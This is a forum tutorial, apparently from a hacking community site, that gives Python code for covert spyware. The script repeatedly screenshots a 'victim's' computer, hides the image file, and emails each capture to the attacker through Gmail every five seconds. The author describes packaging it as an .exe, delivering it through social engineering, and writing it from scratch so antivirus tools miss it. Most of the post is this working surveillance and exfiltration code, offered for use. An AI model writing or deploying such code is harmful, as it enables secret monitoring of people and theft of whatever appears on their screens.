Hi I am a new member of null byte(although I am reading this website from the beginning) and this is going to be my first post.
Let me introduce myself first !
I am from Greece, I am working as a network engineer and I am into system and network administration but definitely I am not a developer. I am not so good at this, I don't want to and I don't have the time for this.
But I have to admit that It is good for anybody in this field(network administration, computer security etc) to have some basic skills and knowledge to fundamentals of programming because without these skills (at least) you will not go very far.
Ok let's begin with my tutorial and I have to say that It is not anything complicated or very technical but I am willing to show you( on my tutorial series) many beautiful python scripts that can give you CLEAN and FAST solutions.
I say clean because when you code something from the begining(an exploit, a listener etc) you don't have to worry about how to evade Antivirus, change signatures etc. and I say fast because It is more easier to make a script, converted as an .exe and make some social engineering instead of using all these tools that are already marked as viruses by the vast majority of anti-viruses.
Step 1: Prologue
As you understand from the title I am going to show you how to make a python script that can send screenshots from the "victim's" computer to the attacker's pc.
The way that It works is that when the "victim" enters this exe(with social engineering) then It saves a screenshot to his computer(we will choose a place to save this png in a way that he can't see It) and It sends a new screenshot every x seconds(minutes etc) to your email.
Step 2: Libraries
First of all let's set our libraries.
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email import Encoders
import os
import autopy
import time
Step 3: Explanation of the Modules
Smtplib=The smtplib module defines an SMTP client session object that can be used to send mail to any Internet machine with an SMTP or ESMTP listener daemon
MIME=You can create a new object structure by creating messages instances, adding attachments and all the appropriate headers manually
import os= This module provides a portable way of using operating system dependent functionality
import autopy= AutoPy is a cross-platform, simple GUI automation toolkit for Python. It includes functions for controlling the keyboard and mouse, finding colors and bitmaps on-screen, and displaying alerts
import time=We will need this module to specify the time that we want the screenshots to our email
Step 4: Global Variables
Now we will put two global variables and we are going to write our email(I have chosen gmail you can choose whatever email service you want) and our password. We set the variables as global because our script is going to need It in many cases.
gmailuser = "blabla@gmail.com"
gmailpwd = "I am the password"
Step 5: Functions
Now we are going to write our two functions.
The first function is for the capturing of the screen and we need to write where do we want to copy the png file on victim's pc.
Example:
def capture():
bitmap = autopy.bitmap.capturescreen()
bitmap.save("C:\capturing.png")
The second function is for setting the parameters for the attachment document:
def mail(to, subject, text, attach):
msg = MIMEMultipart()
msg'From' = gmailuser
msg'To' = "blabla@gmail.com"
msg'Subject' = subject
msg.attach(MIMEText(text))
part = MIMEBase('application', 'octet-stream')
part.setpayload(open(attach, 'rb').read())
Encoders.encodebase64(part)
part.addheader('Content-Disposition',
'attachment; filename="%s"' % os.path.basename(attach))
msg.attach(part)
mailServer = smtplib.SMTP("smtp.gmail.com", 587)
mailServer.ehlo()
mailServer.starttls()
mailServer.ehlo()
mailServer.login(gmailuser, gmailpwd)
mailServer.sendmail(gmailuser,"blabla@gmail.com", msg.asstring())
mailServer.close()
Step 6: The End
The ending function gathers these two functions and setting some parameters like the subject of the email and the time that we want the program to send us the screenshots. I set It to send me the screenshots every 5 seconds but of course you can set the time however you want
def main():
while True:
capture()
mail("some.person@some.address.com",
"Antisocial Engineering",
"This is an evil email",
"C:\capturing.png")
time.sleep(5)
if _name_=='_main_':
main()
Comments
No Comments Exist
Be the first, drop a comment!